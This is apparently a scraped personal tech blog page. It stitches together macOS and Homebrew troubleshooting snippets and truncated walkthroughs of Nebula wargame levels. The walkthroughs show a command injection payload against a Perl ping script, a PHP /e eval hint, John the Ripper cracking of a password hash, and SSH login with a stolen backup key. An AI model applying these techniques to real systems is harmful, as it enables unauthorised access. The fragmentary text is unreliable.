Disable macOS Dock’s Bounce to Alert Behaviour
In Terminal:
defaults write com.apple.dock no-bouncing -bool TRUE
killall Dock
You can add them to ~/.wine/drive_c/Windows/Fonts/ and then restart. Source
$ brew update
Checking out v1.0.1 in /usr/local/Homebrew…
To checkout master in /usr/local/Homebrew run:
‘cd /usr/local/Homebrew && git checkout master
Checking out v1.0.1 in /usr/local/Homebrew/Library/Taps/caskroom/homebrew-cask…
To checkout master in /usr/local/Homebrew/Library/Taps/caskroom/homebrew-cask run:
‘cd /usr/local/Homebrew/Library/Taps/caskroom/homebrew-cask && git checkout master
fatal: Cannot update paths and switch to branch ‘v1.0.1’ at the same time.
Did you intend to checkout ‘refs/tags/1.0.1’ which can not be resolved as commit?
fatal: Needed a single revision
invalid upstream refs/tags/1.0.1
Checking out v1.0.1 in /usr/local/Homebrew/Library/Taps/caskroom/homebrew-versions…
To checkout master in…
ssh servername
/Users/steven/.ssh/config: line 7: Bad configuration option: useroaming
/Users/steven/.ssh/config: terminating, 1 bad configuration options
Line 7 is UseRoaming no, which I added because of CVE-2016-0777.
$ ssh -V
OpenSSH_7.2p2, LibreSSL 2.4.1
Solution: Comment out that line, as the version of OpenSSH that ships with macOS 10.12 no longer has that insecure feature.
Level: https://exploit-exercises.com/nebula/level09/
There’s a C setuid wrapper for some vulnerable PHP code…
To do this level, log in as the level09 account with the password level09. Files for this level can be found in /home/flag09.
$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
Using the e modifier is dangerous and has been removed as of PHP 7.0.0. It causes the replacement string (the second argument) to be evaluated as PHP code. There is a $useme parameter which might come in handy. So what happens is you pass it…
Level: https://exploit-exercises.com/nebula/level08/
World readable files strike again. Check what that user was up to, and use it to log into flag08 account.
To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08.
ls -la /home/flag08
What’s that capture.pcap? Let’s load that in Wireshark. Let’s open our Kali VM.
scp level08@192.0.2.1:/home/flag08/capture.pcap ~/Downloads/
wireshark ~/Downloads/capture.pcap
Open capture.pcap in Wireshark. Right click on the first entry, mouse over Follow and…
Use the escape key combination (ctrl+command), then use the regular macOS screenshot shortcuts. https://support.apple.com/en-au/HT201361
Level: https://exploit-exercises.com/nebula/level07/
The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.
To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.
$host = $_[0];
print("<html><head><title>Ping results</title></head><body><pre>");
@output = `ping -c 3 $host 2>&1`;
…
ping(param("Host"));
The program allows command injection via ?Host=
Let’s set it to localhost; getflag
But how…
Level: https://exploit-exercises.com/nebula/level06/
The flag06 account credentials came from a legacy unix system.
To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.
cat /etc/passwd | grep flag06
Gives us
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
Now fire up Kali because we need to use John the Ripper
echo "flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh" > crack
john --show crack
flag06:hello:993:993::/home/flag06:/bin/sh
Our password is hello
Back on the Nebula system:
su flag06
Password: hello
getflag
You have successfully…
Level: https://exploit-exercises.com/nebula/level04/
Check the flag05 home directory. You are looking for weak directory permissions.
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.
cd /home/flag05
ls -la
ls -la .backup
cp .backup/backup-19072011.tgz ~
cd
tar xvfz backup-19072011.tgz
cd .ssh
ssh -i id_rsa flag05@localhost
getflag
You have successfully executed getflag on a target account.